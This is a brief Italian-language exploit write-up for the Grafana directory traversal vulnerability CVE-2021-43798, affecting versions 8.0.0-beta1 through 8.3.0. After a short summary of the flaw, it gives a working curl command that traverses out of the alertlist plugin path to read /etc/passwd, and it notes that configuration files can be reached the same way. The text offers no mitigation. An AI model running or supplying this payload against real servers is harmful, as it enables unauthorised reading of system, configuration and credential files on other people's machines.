
Exploit per il directory traversal di Grafana (CVE-2021-43798) che consente la lettura non autorizzata di file tramite richieste HTTP appositamente costruite.
Versioni interessate: da Grafana 8.0.0-beta1 a 8.3.0 (escluse le versioni con patch)
Tipo di vulnerabilità: Directory Traversal (attraversamento di directory)
Livello di impatto: Critico
Piattaforma: Grafana (piattaforma open-source di monitoraggio e osservabilità)
⚠️ Dettagli della vulnerabilità In Grafana è possibile eseguire un attraversamento di directory tramite il seguente URL:
Codice http://<grafana_host>/public/plugins// Attraverso questo, un attaccante può leggere file locali sul server. Ad esempio, accesso non autorizzato a /etc/passwd o file di configurazione.
🔥 Esempio di sfruttamento Lettura di un file tramite una semplice richiesta:
bash curl http://target:3000/public/plugins/alertlist/../../../../../../../../etc/passwd Tramite la richiesta sopra è possibile ottenere l'elenco degli utenti del sistema Linux.